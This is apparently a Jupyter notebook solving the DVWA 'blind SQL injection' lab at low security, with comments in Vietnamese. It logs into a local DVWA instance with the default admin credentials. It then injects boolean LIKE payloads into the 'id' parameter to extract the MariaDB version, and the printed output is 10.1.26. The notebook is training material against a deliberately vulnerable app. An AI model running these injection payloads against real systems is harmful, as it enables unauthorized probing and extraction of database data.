## Low-level Blink SQL Injection
Objective: To find SQL version

# 1. Thực hiện đăng nhập

In [5]:
import requests
from bs4 import BeautifulSoup # Thư viện xử lý HTML

USERNAME = "admin"  
PASSWORD = "password"
BASE_URL = "http://localhost:32768/" # DVWA Base URL

# Lưu trữ phiên làm việc
session = requests.Session()

# Truy cập trang đăng nhập để lấy cookie và dữ liệu phiên làm việc
login_page = session.get(BASE_URL + "login.php")
soup = BeautifulSoup(login_page.content, 'html.parser')
user_token = soup.find('input', {'name': 'user_token'}).get('value')

# Gửi yêu cầu đăng nhập
data = {"username": USERNAME, "password": PASSWORD, "user_token": user_token, "Login": "Login#"}
response = session.post(BASE_URL + "login.php", data=data)

# Kiểm tra đăng nhập thành công
# Lưu trữ nội dung trang dashboard
dashboard_page = session.get(BASE_URL + "index.php")

# Lưu trữ tiêu đề dashboard
dashboard_title = BeautifulSoup(dashboard_page.content, 'html.parser').title.text

# 2. Thực hiện kiểm tra phiên bản hiện tại của trang web

--- mariaDB ---

In [6]:
# Kiểm tra đăng nhập thành công hay không
if "Welcome :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*" == dashboard_title:
    # Khởi tạo các biến ban đầu 
    version = ''
    i = 0 # Giá trị số trong version

    # Kiểm tra phiên bản chính / phụ
    while i < 100:
        params = {"id": "1' and version() LIKE '{}%'#".format(str(version)+str(i)+"."), "Submit": "Submit"}
        result = session.get(BASE_URL + "vulnerabilities/sqli_blind/", params = params)

        if "User ID exists in the database." in result.text:
            version = version + str(i) + '.'
            i = 1
        else: 
            i = i + 1

    # Kiểm tra bản vá lỗi nhỏ
    while i > 0:
        params = {"id": "1' and version() LIKE '{}%'#".format(str(version)+str(i)), "Submit": "Submit"}
        result = session.get(BASE_URL + "vulnerabilities/sqli_blind/", params = params)

        if "User ID exists in the database." in result.text:
            version = version + str(i) 
        else: 
            i = i - 1

    # In ra phiên bản
    print("Phiên bản MariaDB là {}".format(version))
else:
    print("Đăng nhập thất bại")

Phiên bản MariaDB là 10.1.26
